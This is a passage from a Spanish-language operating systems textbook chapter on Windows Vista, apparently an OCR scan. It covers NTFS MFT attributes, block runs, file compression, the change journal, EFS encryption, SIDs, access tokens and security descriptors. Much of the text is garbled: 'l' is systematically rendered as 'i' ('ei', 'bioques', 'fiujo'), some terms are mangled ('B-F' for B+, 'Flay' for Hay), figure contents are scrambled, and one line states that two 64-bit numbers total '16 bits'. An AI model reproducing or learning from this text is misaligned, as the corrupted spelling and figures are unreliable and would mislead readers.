zado de atributo, vaior). Ei encabezado dei registro contiene un número mágico que se utiiiza para 
comprobar ia vaiidez, un número de secuencia que seactuaiiza cada vez que se reutiiiza ei registro 
para un nuevo archivo, un conteo de referencias ai archivo, ei número actuai de bytes en ei registro 
utiiizado, ei identificador (índice, número de secuencia) dei registro base (se utiiiza sóio para ios re¬ 
gistros de extensión) y aigunos campos más. 

NTFS define 13 atributos que pueden aparecer en ios registros de ia M FT. Éstos se iistan en ia 
figura 11-42. Cada encabezado de atributo identifica ai atributo y proporciona ia iongitud y ubica¬ 
ción dei campo de vaior, junto con una variedad de banderas y demás información. Por io generai, 
ios vaiores de ios atributos siguen justo después de sus encabezados, pero si un vaior es demasiado 
iargo y no cabe en ei registro de ia M FT, se puede coi ocar en bioques de disco separados. Se dice 
que dicho atributo es un atributo no residente. Ei atributo de datos es un candidato obvio. Aigu¬ 
nos atributos se pueden repetir (como ei nombre), pero todos ios atributos deben aparecer en un or¬ 
den fijo en ei registro de ia M FT. Los encabezados para ios atributos residentes tienen una iongitud 
de 24 bytes: ios encabezados para ios atributos no residentes son más iargos debido a que contie¬ 
nen información que indica en dónde se encuentra ei atributo en ei disco. 

Ei campo de información estándar contiene ei propietario dei archivo, información de seguri¬ 
dad, ias etiquetas de hora que necesita POSIX, ei conteo de víncuios duros, ios bits de sóio iectura 
y archivo, etc. Es un campo de iongitud fija y siempre está presente. Ei nombre de archivo es una 
cadena Unicode de iongitud variabie. Para que ios archivos con nombres que no son de M S-DOS 
sean accesibies para ios programas de 16 bits, ios archivos también pueden tener un nombre corto 
de M S-DOS de 8 -F 3. Si ei nombre actuai dei archivo se conforma a ia regia de nomenciatura de 
8 -F 3 de M S-DOS, no se necesita un nombre de M S-DOS secundario. 

En NT 4.0, ia información de seguridad se coiocó en un atributo, pero en Windows 2000 y ver¬ 
siones posteriores, toda ia información de seguridad va en un soio archivo, para que varios archi- 
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Atributo 

Descripción 

Información estándar 

Bits de bandera, etiquetas de hora, etc. 

Nombre de archivo 

Nombre de archivo en Unicode; se puede repetir para el nombre 

de MS-DOS 

Descriptor de seguridad 

Obsoleto. La información de seguridad está ahora en $Extend$Secure 

Lista de atributos 

Ubicación de los registros adicionales de la MFT, si se necesitan 

ID de objeto 

Identificador de archivo de 64 bits único para este volumen 

Punto de reanálisis 

Se utiliza para el montaje y los vínculos simbólicos 

Nombre del volumen 

Nombre de este volumen (se utiliza sólo en $Volume) 

Información del volumen 

Versión del volumen (se utiliza sólo en $Volume) 

Raíz del índice 

Se utiliza para los directorios 

Asignación de índice 

Se utiliza para directorios muy grandes 

Mapa de bits 

Se utiliza para directorios muy grandes 

Flujo de utilería con registro 

Controla el registro de actividades para $LogF¡le 

Datos 

Datos de flujo: se pueden repetir 


Figura 11-42. Los atributos utilizados en los registros de la M FT. 


vos puedan compartir las mismas descripciones de seguridad. Esto produce ahorros considerables en 
espacio dentro de la mayoría de los registros de la M FT y en el sistema de archivos en general, ya 
que la información de seguridad para muchos de los archivos que posee cada usuario es idéntica. 

L a lista de atributos se necesita en caso de que los atributos no quepan en el registro de la M FT. 
Así, este atributo indica en dónde se pueden encontrar los registros de extensión. Cada entrada en 
la lista contiene un índice de 48 bits en la M FT, el cual indica en dónde está el registro de exten¬ 
sión y un número de secuencia de 16 bits para permitir la verificación de que coincidan el registro 
de extensión y los registros base. 

Los archivos de NTFS tienen asociado un ID, el cual es como el número de nodo-i en UNIX. 
Los archivos se pueden abrir por ID, pero el ID que les asigna NTFS no siempre es útil cuando de¬ 
be persistir, debido a que se basa en el registro de la M FT y puede cambiar si se mueve el registro 
para el archivo (por ejemplo, si el archivo se restaura del respaldo). NTFS permite el uso de un atri¬ 
buto de ID de objeto separado, el cual se puede establecer en un archivo y no necesita cambiar nun¬ 
ca. Por ejemplo, se puede mantener con el archivo si se copia a un nuevo volumen. 

El punto de reanálisis indica al procedimiento que analiza el nombre de archivo que debe ha¬ 
cer algo especial. Este mecanismo se utiliza para montar sistemas de archivos de manera explícita 
y para los vínculos simbólicos. Los dos atributos del volumen sólo se utilizan para identificarlo. Los 
siguientes tres atributos se relacionan con la forma en que se implementan los directorios. Los pe¬ 
queños son sólo listas de archivos, pero los grandes se implementan mediante el uso de árboles B -F. 
El atributo de flujo utilitario con registro lo utiliza el sistema de archivos de cifrado. 

Por último, llegamos al atributo más importante de todos: el flujo de datos (o en algunos casos, 
flujos). Un archivo NTFS tiene uno o más flujos de datos asociados. Aquí es donde está la carga 
útil. El flujo de datos predeterminado no tiene nombre (por ejemplo rutadir\nombrearch::$DATA), 
pero el flujo de datos alternativo (o flujos) tiene un nombre, por ejemplo rutadir\nombrearch- 
::nombrefl ujo:$DATA. 
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Para cada flujo se coloca su nombre (si está presente) en este encabezado de atributo. Después 
dei encabezado está una iista de direcciones de disco que indican ios bioques que contiene ei fiujo, 
o para fiujos de sóio unos cuantos cientos de bytes (y hay muchos de estos), ei mismo fiujo. Si se 
coiocan ios datos dei fiujo actuaies en ei registro de ia M FT, se denomina archivo inmediato (M u- 
iiender y Tanenbaum, 1984). 

Desde iuego que ia mayor parte dei tiempo ios datos no caben en ei registro de ia M FT, por io 
que este atributo casi siempre no es residente. Ahora veamos ia forma en que NTFS iieva ei regis¬ 
tro de ia ubicación de ios atributos no residentes, en datos específicos. 


Asignación dei aimacenamiento 

Ei modeio para iievar ia cuenta de ios bioques de disco es que se asignan en tiradas de bioques con¬ 
secutivos siempre que sea posibie, por cuestiones de eficiencia. Por ejempio, si ei primer bioque ió- 
gico de un fiujo se coioca en ei bioque 20 en ei disco, entonces ei sistema se esforzará por coiocar 
ei segundo bioque iógico en ei bioque 21, ei tercer bioque iógico en ei bioque 22, y así en io suce¬ 
sivo. Una forma de iograr estas tiradas es asignar ei aimacenamiento de disco varios bioques a ia 
vez, siempre que sea posibie. 

Los bioques en un fiujo se describen mediante una secuencia de registros, cada uno de ios cua- 
ies describe una secuencia de bioques iógicamente contiguos. Para un fiujo sin hoyos, sóio habrá 
uno de esos registros. Los fiujos que se escriben en orden desde ei principio hasta ei finai pertene¬ 
cen a esta categoría. Para un fiujo con un hoyo (por ejempio, sóio están definidos ios bioques dei 
0 ai 49 y dei 60 ai 79) habrá dos registros. Dicho fiujo se podría producir ai escribir ios prime¬ 
ros 50 bioques y después buscar hacia adeiante hasta ei bioque iógico 60 y escribir otros 20 bio¬ 
ques. Cuando se vueive a ieer un hoyo, todos ios bytes faitantes son ceros. Los archivos con hoyos 
se conocen como archivos dispersos. 

Cada registro empieza con un encabezado que proporciona ei despiazamiento dei primer bio¬ 
que dentro dei fiujo. Después ie sigue ei despiazamiento dei primer bioque que no está cubierto por 
ei registro. En ei ejempio anterior, ei primer registro tendría un encabezado de (0, 50) y proporcio¬ 
naría ias direcciones de disco para estos 50 bioques. Ei segundo tendría un encabezado de (60, 80) 
y proporcionaría ias direcciones de disco para estos 20 bioques. 

Cada encabezado de registro va seguido por uno o más pares, cada uno de ios cuaies propor¬ 
ciona una dirección de disco y una iongitud de tirada. La dirección de disco es ei despiazamiento 
dei bioque de disco desde ei inicio de su partición: ia iongitud de ia tirada es ei número de bioques 
en ia misma. Puede haber todos ios pares que se necesiten en ei registro de tirada. En ia figura 
11-43 se muestra ei uso de este esquema para un fiujo de tres tiradas y nueve bioques. 

En esta figura tenemos un registro de ia M FT para un fiujo corto de nueve bioques (encabeza¬ 
do 0 a 8). Consiste en tres tiradas de bioques consecutivos en ei disco. La primera tirada está com¬ 
puesta por ios bioques 20 a 23, ia segunda por ios bioques 64 a 65 y ia tercera por ios bioques 80 a 
82. Cada una de estas tiradas está registrada en ei registro de ia M FT como un par (dirección de dis¬ 
co, conteo de bioques). Ei número de tiradas que haya depende de qué tan bien hizo su trabajo ei 
asignador de bioques de disco ai encontrar tiradas de bioques consecutivos cuando se creó ei fiujo. 
Para un fiujo de n bioques, ei número de tiradas puede estar entre 1 y n. 
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Aquí vale la pena hacer varios comentarios. En primer iugar no hay un iímite superior en cuan¬ 
to ai tamaño de ios fiujos que se pueden representar de esta forma. A taita de compresión de ias di¬ 
recciones, cada par requiere dos números de 64 bits en ei par, para totaiizar 16 bits. Sin embargo, 
un par podría representar 1 miiión de bioques de disco consecutivos o más. De hecho, un fiujo de 
20 M B que consiste de 20 ejecuciones separadas de 1 miiión de bioques de 1 KB cada una cabe sin 
probiemas en un registro de ia M FT, mientras que un fiujo de 60 KB esparcido en 60 bioques ais- 
iados no cabe. 

En segundo iugar, aunque i a forma directa de representar cada par requiere 2x8 bytes, hay 
un método de compresión disponibie para reducir ei tamaño de ios pares a un vaior menor de 16. 
M uchas direcciones de disco tienen varios bytes cero de orden superior. Éstos se pueden omitir. Ei 
encabezado de datos indica cuántos bytes se omiten; es decir, cuántos bytes se utiiizan en reaiidad 
por cada dirección. También se utiiizan otros tipos de compresión. En ia práctica, ios pares son a 
menudo de sóio 4 bytes. 

N uestro primer ejempio fue sencido: toda ia información dei archivo cupo en un registro de ia 
M FT. Pero, ¿qué ocurre si ei archivo están grande o tan fragmentado que ia información de ios bio¬ 
ques no cabe en un registro de ia M FT? La respuesta es simpie: se utiiizan dos o más registros de 
ia M FT. En ia figura 11-44 podemos ver un archivo cuyo registro base está en ei registro 102 de ia 
M FT. Tiene demasiadas ejecuciones para un soio registro de ia M FT, por io que caicuia cuántos re¬ 
gistros de extensión necesita: en este caso necesita dos, por io que coioca sus índices en ei registro 
base. Ei resto dei registro se utiiiza para ias primeras k ejecuciones de datos. 

Observe que ia figura 11-44 contiene cierta redundancia. En teoría no debería ser necesario es¬ 
pecificar ei finai de una secuencia de ejecuciones, debido a que esta información se puede caicuiar 
de ios pares de ejecuciones. Se "especifica de más" esta información con ei fin deque ia búsqueda 
sea más eficiente: para encontrar ei bioque en un despiazamiento de archivo dado sóio es necesario 
examinar ios encabezados dei registro y no ios pares de ejecuciones. 
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Segundo registro de extensión 


Primer registro de extensión 


Registro base 


Figura 11-44. U n archivo que requiere tres registros de ia M FT para aimacenar todas 
sus ejecuciones. 

Cuando se ha utilizado todo el espacio en el registro 102, el almacenamiento de las ejecucio¬ 
nes continúa con el registro 105 de la M FT. En este registro se empaquetan todas las ejecuciones 
que quepan. Cuando este registro también está lleno, el resto de las ejecuciones se coloca en el re¬ 
gistro 108 de la M FT. De esta forma se pueden utilizar muchos registros de la M FT para manejar 
archivos fragmentados extensos. 

Flay un problema que se produce cuando se necesitan tantos registros de la M FT que no hay 
espacio en la M FT base para listar todos sus índices. También hay una solución a este problema: la 
lista de registros de extensión de la M FT se hace no residente (es decir, se almacena en otros blo¬ 
ques de disco y no en el registro base de la M FT). Así puede crecer hasta el tamaño que desee. 

En la figura 11-45 se muestra una entrada en la M FT para un directorio pequeño. El registro 
contiene varias entradas de directorios, cada una de las cuales describe a un archivo o directorio. 
Cada entrada tiene una estructura de longitud fija seguida de un nombre de archivo de longitud va¬ 
riable. La parte fija contiene el índice de la entrada en la M FT para el archivo, la longitud del nom¬ 
bre del archivo y una variedad de campos y banderas adicionales. Para buscar una entrada en un 
directorio hay que examinar todos los nombres de archivos en turno. 


Encabezado de 
información estándar 


Una entrada de directorio contiene ei índice en ia 
Encabezado MFT para ei archivo, ia iongitud dei nombre dei 
de raíz dei índice archivo, ei nombre dei archivo en sí, y varios 
campos y banderas 


Encabezado 
de registro... 


\ \/ 


información 

estándar 



Figura 11-45. Ei registro de ia M FT para un directorio pequeño. 

Los directorios grandes utilizan un formato distinto. En vez de listar los archivos en forma li¬ 
neal, se utiliza un árbol B-F para que sea posible la búsqueda alfabética y para facilitar la inserción 
de nuevos nombres en el directorio, en el lugar apropiado. 

A hora tenemos suficiente información como para terminar de describir la forma en que se rea¬ 
liza la búsqueda del nombre de archivo \??\C :\foo\bar. En la figura 11-22 vimos cómo cooperaban 
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Win32, las llamadas al sistema nativas de NT y ios administradores de objetos y de E/S para abrir un 
archivo, ai enviar una petición de E/S a ia piia de dispositivos de NTFS para ei voiumen C:. La pe¬ 
tición de E/S pide a NTFS que iiene un objeto de archivo para ei nombre de ruta restante, \foo\bar. 

Ei anáiisis que reai iza NTFS de i a ruta \foo\bar empieza en ei directorio raíz para C:, cuyos 
bioques se pueden encontrar desde ia entrada 5 en ia M FT (vea ia figura 11-41). La cadena "foo" 
se busca en ei directorio raíz, ei cuai devueiveei índice en ia M FT para ei directorio foo. Después se 
busca en este directorio ia cadena "bar", que se refiere ai registro de ia M FT para este archivo. 
NTFS reaiiza comprobaciones de acceso mediante una iiamada de retorno ai monitor de referencia 
de seguridad, y si todo está bien busca ei registro de ia M FT para ei atributo ::$DATA, queesei fiu- 
jo de datos predeterminado. 

Ai encontrar ei archivo bar, NTFS estabiecerá apuntadores a sus propios metadatos en ei obje¬ 
to de archivo que se pasó desde ei administrador de E/S. Los metadatos inciuyen un apuntador ai re¬ 
gistro de ia M FT, información sobre ia compresión y ios bioqueos de rangos, varios detaiies sobre ia 
compartición, etcétera. La mayor parte de estos metadatos están en ias estructuras de datos compar¬ 
tidas entre todos ios objetos de archivo que hacen referencia a ese archivo. Hay unos cuantos cam¬ 
pos específicos sóio para ei archivo actuai abierto: por ejempio, si se debe eiiminar ei archivo 
después de cerrado. Una vez que tiene éxito ia operación de apertura, NTFS iiama a loCompieteRe- 
quest para pasar ei IRP de vueita a ia piia E/S para ios administradores de E/S y de objetos. Por úi- 
timo, se coioca un manejador para ei objeto de archivo en ia tabia de manejadores para ei proceso 
actuai y ei controi se pasa de vueita ai modo de usuario. En ias próximas iiamadas a ReadFiie, una 
apiicación puede proporcionar ei manejador para especificar que este objeto de archivo para C:\foo- 
\bar se debe inciuir en ia petición de iectura que se pasa por ia piia dei dispositivo C: a NTFS. 

Además de ios archivos y directorios reguiares, NTFS admite víncuios duros en ei sentido de 
UNIX, y también víncuios simbóiicos mediante un mecanismo conocido como puntos de reanálisis 
NTFS admite ei proceso de marcar un archivo o directorio como punto de reanáiisis y asociarie un 
bioque de datos. Cuando se encuentra ei archivo o directorio durante ei anáiisis de un nombre de ar¬ 
chivo, ia operación faiia y ei bioque de datos se devueive ai administrador de objetos. Este adminis¬ 
trador puede interpretar ios datos como si representaran un nombre de ruta aiternativo, para después 
actuaiizar ia cadena para anaiizary reintentar ia operación de E/S. Este mecanismo se utiiiza para dar 
soportea ios víncuios simbóiicos y ios sistemas de archivos montados, con io cuai se redirige ia bús¬ 
queda hacia una parte distinta de ia jerarquía de directorios, o inciuso hacia una partición distinta. 

Los puntos de reanáiisis también se utiiizan para marcar archivos individuaies para ios drivers 
defiitrosdei sistema de archivos. En ia figura 11-22 mostramos cómo se pueden instaiar fiitrosdei 
sistema de archivos entre ei administrador de E/S y ei sistema de archivos. Las peticiones de E/S se 
compietan mediante una iiamada a loCompieteRequest, que pasa ei controi a ias rutinas de compre¬ 
sión que representaba cada driver en ia piia de dispositivos insertada en ei IRP, en el momento 
en que se estaba haciendo la petición. Un driver que desea marcar un archivo asocia una etiqueta de 
reanálisis y después observa las peticiones de compleción para las operaciones de abrir archivos que 
fallaron debido a que se toparon con un punto de reanálisis. Del bloque de datos que se pasa devuel¬ 
ta con el IRP, el driver puede saber si éste es un bloque de datos que el mismo driver asoció con el 
archivo. De ser así, el driver dejara de procesar la compleción y continuará procesando la petición 
de E/S original. En general, para esto se requerirá proceder con la petición de abrir el archivo, pero 
hay una bandera que indica a NTFS que debe ignorar el punto de reanálisis y abrir el archivo. 
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Compresión de archivos 

NTFS proporciona compresión transparente de archivos. Se puede crear un archivo en modo com¬ 
primido, io cuai significa que NTFS trata automáticamente de comprimir ios bioques a medida que 
se escriben en ei disco, y ios descomprime de manera automática cuando sevueiven a ieer. Los pro¬ 
cesos que ieen o escriben archivos comprimidos no tienen idea dei hecho de que se está iievando a 
cabo ia compresión y descompresión. 

La compresión funciona de ia siguiente manera. Cuando NTFS escribe un archivo marcado pa¬ 
ra compresión en ei disco, examina ios primeros 16 bioques (iógicos) dei archivo, sin importar 
cuántas ejecuciones ocupen. Después ejecuta un aigoritmo de compresión sobre eiios. Si ios datos 
resuitantes se pueden aimacenar en 15 bioques o menos, ios datos comprimidos se escriben en ei 
disco, de preferencia en una ejecución si es posibie. Si ios datos comprimidos aún ocupan 16 bio¬ 
ques, estos 16 bioques se escriben en formato descomprimido. Después se examinan ios bioques 16 
a 31 para ver si se pueden comprimir en 15 bioques o menos, y así en io sucesivo. 

La figura ll-46(a) muestra un archivo en ei que ios primeros 16 bioques se comprimieron con 
éxito en ocho bioques, ios otros 16 bioques no se pudieron comprimir, y ios siguientes 16 bioques 
se comprimieron en 50%. Las tres partes se han escrito como tres ejecuciones y se han aimacena- 
do en ei registro de ia M FT. Los bioques "faitantes" se aimacenan en ia entrada en ia M F con ia di¬ 
rección de disco 0, como se muestra en ia figura ll-46(b). Aquí ei encabezado (0, 48) va seguido 
de cinco pares, dos para ia primera ejecución (comprimida), uno para ia ejecución descomprimida 
y dos para ia ejecución finai (comprimida). 


Archivo original descomprimido 




Dirección 30 37 40 55 85 92 

de disco (a) 


Cinco ejecuciones 

Encabezado (de las cuales dos están vacías) 










y/////////////////Á 

Información 

estándar 

Nombre 
de archivo 

00 

o 

00 

o 

co 

00 

o 

40 1 16 

85 ; 8 

00 

o 

^^in utilizar % 


(b) 


Figura 11-46. (a) U n ejemplo de cómo se comprime un archivo de 48 bloques en 
32 bloques, (b) El registro de la M FT del archivo, después de comprimirlo. 


Cuando el archivo se vuelve a leer, NTFS tiene que saber cuáles ejecuciones están comprimi¬ 
das y cuáles no. Para ello se basa en las direcciones de disco. Una dirección de disco de 0 indica 
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que es la parte final de 16 bloques comprimidos. El bloque de disco 0 no se puede utilizar para al¬ 
macenar datos, para evitar la ambigüedad. Como el bloque 0 en el volumen contiene el sector de 
inicio, de todas formas es imposible utilizarlo para datos. 

El acceso aleatorio a los archivos comprimidos es posible, pero complicado. Suponga que un 
proceso realiza una búsqueda del bloque 35 de la figura 11-46. ¿Cómo localiza NTFS el bloque 35 
en un archivo comprimido? La respuesta es que tiene que leer y descomprimir primero toda la eje¬ 
cución. Después sabe en dónde está el bloque 35 y lo puede pasar a cualquier proceso que lo lea. 
La elección de 16 bloques para la unidad de compresión fue un compromiso. Si se hubiera elegido 
un tamaño menor, la compresión hubiera sido menos efectiva. Si se hubiera elegido un tamaño ma¬ 
yor, el acceso aleatorio hubiera requerido de un mayor esfuerzo. 


Registro de transacciones 

NTFS proporciona dos mecanismos para que los programas detecten cambios en los archivos y di¬ 
rectorios en un volumen. El primer mecanismo es una operación de E/S conocida como NtNotify- 
changeDirectonyFiie, que pasa un búfer al sistema, que a su vez regresa cuando se detecta un 
cambio en un directorio o subárbol de directorios. El resultado de la E/S es que el búfer está lleno 
de una lista de registros de cambios. Con suerte, el búfer tendrá el tamaño suficiente. En caso con¬ 
trario, los registros que no quepan en el búfer se perderán. 

El segundo mecanismo es el diario de cambios de NTFS. Este sistema de archivos mantiene 
una lista de todos los registros de cambios para los directorios y archivos en el volumen en un ar¬ 
chivo especial, que los programas pueden leer mediante el uso de operaciones de control especia¬ 
les del sistema de archivos: es decir, la opción FSCTL_OUERY_USNJOURNAL para la API 
NtFsControiFiie. El archivo de transacciones es por lo general muy extenso, y hay poca probabi¬ 
lidad de que se vuelvan a utilizarlas entradas antes de poder examinarlas. 


C ifrado de archivos 

Las computadoras se utilizan en la actualidad para almacenar todo tipo de información delicada, co¬ 
mo los planes para tomar el control de empresas, la información fiscal y las cartas de amor, que los 
propietarios no desean revelar a nadie. La pérdida de información puede ocurrir cuando una compu¬ 
tadora portátil se pierde o alguien la roba, cuando un sistema de escritorio se reinicia utilizando un 
disco flexible para evadir la seguridad de Windows, o cuando un disco duro se quita de una compu¬ 
tadora y se instala en otra con un sistema operativo inseguro. 

Para lidiar con estos problemas, Windows cuenta con una opción para cifrar archivos, para que 
en caso de que alguien robe la computadora o ésta se reinicie mediante M S-DOS, los archivos no 
se puedan leer. La forma normal de usar el cifrado de Windows es marcar ciertos directorios como 
cifrados, de manera que todos los archivos en ellos se cifran y los nuevos archivos que se muevan 
a estos directorios o se creen en ellos también se cifran. El proceso actual de cifrado y descifrado 
no lo maneja NTFS, sino un driver conocido como EPS (Encryption File System, Sistema de cifra¬ 
do de archivos), el cual registra llamadas de retorno con NTFS. 
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EPS proporciona cifrado para directorios y archivos específicos. También hay otra herramien¬ 
ta de cifrado en Windows Vista conocida como BitLocker, ia cuai cifra casi todos ios datos en un 
voiumen, para ayudara proteger ios datos sin importar io demás; siempre y cuando ei usuario apro¬ 
veche ios mecanismos disponibies para ias ciaves sóiidas. Dado ei número de sistemas que se pier¬ 
den o se roban todo ei tiempo, y ia gran sensibiiidad a ia cuestión dei robo de identidad, es muy 
importante asegurar que ios secretos estén protegidos. A diario se pierde una cantidad sorprenden¬ 
te de portátiies. Las principaies empresas de Waii Street supuestamente pierden en promedio una 
portátii por semana en ios taxis, tan sóio en ia ciudad de Nueva York. 


11.9 LA SEGURIDAD EN WINDOWS VISTA 

A hora que acabamos de anaiizar ei cifrado, es buen momento para examinar ia seguridad en gene- 
rai. NT se diseñó en un principio para cumpiir con ios requerimientos de seguridad C2 dei Depar¬ 
tamento de Defensa de ios Estados Unidos (DoD 5200.28-STD): ei Libro naranja, que ios sistemas 
seguros a prueba de ataques DoD deben cumpiir. Este estándar requiere que ios sistemas operativos 
tengan ciertas propiedades para poder ciasificarios como io bastante seguros para ciertos tipos de 
trabajo miiitar. Aunque Windows Vista no se diseñó de manera específica para cumpiir con ios re¬ 
querimientos C2, hereda muchas propiedades de seguridad dei diseño originai de NT, entre eiias: 

1. Inicio de sesión seguro con medidas anti-supiantación de identidad. 

2. Controies de acceso discrecionaies. 

3. Controies de acceso priviiegiados. 

4. Protección dei espacio de direcciones por proceso. 

5. Las nuevas páginas deben ponerse en ceros antes de asignadas. 

6. Auditoría de seguridad. 

A hora repasemos brevemente estos puntos. 

Un inicio de sesión seguro significa queei administrador dei sistema puede requerir que todos 
sus usuarios tengan una contraseña para poder iniciar sesión. La supiantación de identidad es cuan¬ 
do un usuario maiicioso escribe un programa que muestra ei indicador de inicio de sesión en ia pan- 
tai ia y después se ai ej a de ia computadora, esperando que un usuario inocente se si ente y escriba un 
nombre y su contraseña. Después, ei nombre y i a contraseña se escriben en discoy se indica ai usua¬ 
rio quefaiió ei inicio de sesión. Para evitar este ataque, Windows Vista instruye a ios usuarios que 
opriman CTRL-ALT-SUPR antes de iniciar sesión. Ei driver dei teciado siempre captura esta se¬ 
cuencia ciave, y después invoca a un programa dei sistema quecoioca ia pantaiia de inicio de sesión 
genuina. Este procedimiento funciona debido a que no hay manera de que ios procesos de usuario 
deshabiiiten ei procesamiento de CTRL-ALT-SUPR en ei driver dei teciado. Pero NT puede 
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deshabilitar (y lo hace) el uso de la secuencia de atención seguro CTR-ALT-SUPR en algunos ca¬ 
sos. Esta idea provino de Windows X P y Windows 2000, que solían tener más compatibilidad (en 
orden) para los usuarios que cambiaban de Windows 98. 

Los controles de acceso discrecionales permiten al propietario de un archivo u otro objeto de¬ 
cir quién puede usarlo y de qué forma. Los controles de acceso privilegiados permiten al adminis¬ 
trador del sistema (superusuario) redefinirlos cuando sea necesario. La protección del espacio de 
direcciones simplemente significa que cada proceso tiene su propio espacio de direcciones virtua¬ 
les que no está accesible para un proceso sin autorización. El siguiente punto significa que cuando 
crece el montículo del proceso, las páginas asignadas se i nidal izan con cero, de manera que los pro¬ 
cesos no puedan encontrar la información que colocó el propietario anterior (de aquí que se utilice 
la lista de páginas en ceros de la figura 11-36, la cual provee una lista de páginas en ceros para es¬ 
te fin). Por último, la auditoría de seguridad permite al administrador producir un registro de cier¬ 
tos eventos relacionados con la seguridad. 

Aunque el Libro naranja no especifica lo que debe ocurrir cuando alguien roba su computado¬ 
ra portátil, en las organizaciones grandes es común tener un robo por semana. En consecuencia, 
Windows Vista ofrece herramientas que un usuario concienzudo puede utilizar para minimizar el 
daño cuando se roba o se pierde una portátil (por ejemplo, el inicio de sesión seguro o el cifrado de 
archivos). Claro que los usuarios concienzudos son precisamente los que no pierden sus portátiles: 
son los demás usuarios los que ocasionan el problema. 

En la siguiente sección analizaremos los conceptos básicos detrás de la seguridad de Windows 
Vista. Después analizaremos las llamadas al sistema de seguridad. Por último veremos la forma en 
que se implementa la seguridad. 

11.9.1 C onceptos fundamentales 

Todo usuario (y grupo) de Windows Vista se identifica mediante un SID (Security ID, ID de seguri¬ 
dad). Los SIDs son números binarios con un encabezado corto seguido de un componente aleatorio 
largo. Cada SID está diseñado para ser único en todo el mundo. Cuando un usuario inicia un proceso, 
el proceso y sus hilos se ejecutan bajo el SID del usuario. La mayor parte del sistema de seguridad es¬ 
tá diseñada para asegurar que sólo los hilos con SIDs autorizados tengan acceso a los objetos. 

Cada proceso tiene un token de acceso que especifica un SID y otras propiedades. Por lo ge¬ 
neral, el token se crea mediante winlogon, como veremos a continuación. El formato del token se 
muestra en la figura 11-47. Los procesos pueden llamar a GetTokeninformation para adquirir esta 
información. El encabezado contiene cierta información administrativa. El campo de la hora de ex¬ 
piración podría indicar cuando el token deja de ser válido, pero en la actualidad no se utiliza. El 
campo Grupos especifica los grupos a los que pertenece el proceso, información necesaria para 
el subsistema POSIX. La DACL (Discrecional ACL, ACL discrecional) es la lista de control de ac¬ 
ceso que se asigna a los objetos creados por el proceso, si no se especifica otra ACL. El SID de 
usuario indica quién es el propietario del proceso. Las SIDs restringidas son para permitir que los 
procesos que no sean de confianza participen en tareas con los procesos de confianza, pero con me¬ 
nos poder para hacer daño. 

Por último, los privilegios listados (si los hay) otorgan al proceso poderes especiales que se nie¬ 
gan a los usuarios ordinarios, como el derecho de apagar el equipo o el acceso a los archivos a los 


920 


CASO DE ESTUDIO 2: WINDOWS VISTA 


CAPITULO 11 


que se negaría el acceso de cualquier otra forma. En efecto, los privilegios dividen el poder del su- 
perusuario en varios permisos que se pueden asignar a los procesos en forma individual. De esta 
forma, un usuario puede recibir parte del poder de superusuario, pero no todo. En resumen, el to- 
ken de acceso indica quién es el propietario del proceso y qué valores predeterminados y poderes 
están asociados con él. 


Encabe¬ 

zado 

Hora de 
expiración 

Grupos 

CACE 

predeter¬ 

minada 

SID de 
usua 
-rio 

SID de 
grupo 

SIDs 

restringi¬ 

dos 

Privilegios 

Nivel de 
imitaoión 
de identidad 


Nivel de 
ntegridad 


Figura 11-47. Estructura de un token de acceso. 


Cuando un usuario inicia sesión, winlogon otorga al proceso inicial un token de acceso. Los pro¬ 
cesos subsiguientes por lo general heredan este token más adelante. Al principio, el token de acceso 
de un proceso se aplica a todos sus hilos. Sin embargo, un hilo puede adquirir un token de acceso dis¬ 
tinto durante la ejecución, en cuyo caso el token de acceso al hilo invalida el token de acceso del 
proceso. En especial, un hilo cliente puede pasar sus permisos de acceso a un hilo servidor para per¬ 
mitir que éste acceda a los archivos protegidos y demás objetos del cliente. A este mecanismo se le 
conoce como imitación de identidad. Se implementa mediante los niveles de transporte (por ejem¬ 
plo: ALPC, tuberías con nombre y TCP/IP) y se utiliza en las RPC para la comunicación de los 
clientes a los servidores. L os transportes utilizan interfaces internasen el componente del monitor de 
referencia de seguridad del kernel, para extraer el contexto de seguridad para el token de acceso del 
hilo actual y enviarlo al lado servidor, en donde se utiliza para construir un token que el servidor 
puede utilizar para hacerse pasar por el cliente. 

El descriptor de seguridad es otro concepto básico. Cada objeto tiene asociado un descriptor 
de seguridad, el cual indica quién puede realizar operaciones sobre él. Los descriptores de seguri¬ 
dad se especifican al momento de crear los objetos. El sistema de archivos NTFS y el registro man¬ 
tienen una forma persistente de descriptor de seguridad, el cual se utiliza para crear el descriptor de 
seguridad para los objetos Archivo y Clave (los objetos del administrador de objetos representan 
instancias abiertas de archivos y claves). 

Un descriptor de seguridad consiste en un encabezado seguido de una DACL con una o más 
ACEs (Access Control Entries, Entradas de control de acceso). Los dos tipos principales de ele¬ 
mentos son Permitir y Denegar. Un elemento Permitir especifica un SID y un mapa de bits, que a 
su vez especifica cuáles procesos de operaciones puede realizar ese SID en el objeto. Un elemento 
Denegar funciona de la misma manera, excepto que una coincidencia indica que el proceso que ha¬ 
ce la llamada no puede realizar la operación. Por ejemplo, Ida tiene un archivo cuyo descriptor de 
seguridad especifica que todos tienen acceso de lectura, pero Elvis no tiene acceso. Cathy tiene ac¬ 
ceso de lectura/escritura, el da ti ene acceso completo. Este ejemplo simple se i lustra en lafigura 11-48. 
El SID Todos se refiere al conjunto de todos los usuarios, pero se invalida por cualquier ACE que 
le siga. 

Además de la DACL, un descriptor de seguridad también tiene una SACL (System Access 
Control List, lista de Control deAcceso del Sistema), que es como una DACL sólo que no especi¬ 
fica quién puede usar el objeto, sino qué operaciones en el objeto se registran en el registro de even- 
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Descriptor 
de seguridad 



ACE 


ACE 


Figura 11-48. U n ejemplo de descriptor de seguridad para un archivo. 


tos de seguridad en todo el sistema. En la figura 11-48, cada operación queM arilyn realice en el ar¬ 
chivo quedará registrada. La SACL también contiene el nivel de integridad, que analizaremos en 
breve. 


11.9.2 Llamadas a la API de seguridad 

Lamayor parte del mecanismo de control de acceso de WindowsVista se basa en los descriptores 
de seguridad. El patrón usual es que cuando un proceso crea un objeto, proporciona un descriptor de 
seguridad como uno de los parámetros para cneateProcess, createPiie u otra llamada de creación 
de objetos. Así, ese descriptor de seguridad se convierte en el descriptor de seguridad unido al ob¬ 
jeto, como vimos en la figura 11-48. Si no se proporciona un descriptor de seguridad en la llamada 
de creación del objeto, se utiliza la seguridad predeterminada en el token de acceso del proceso que 
hace la llamada (vea la figura 11-47). 

M uchas de las llamadas de seguridad de la API Win32 se relacionan con la administración de 
los descriptores de seguridad, por lo que aquí nos enfocaremos en ellos. Las llamadas más impor¬ 
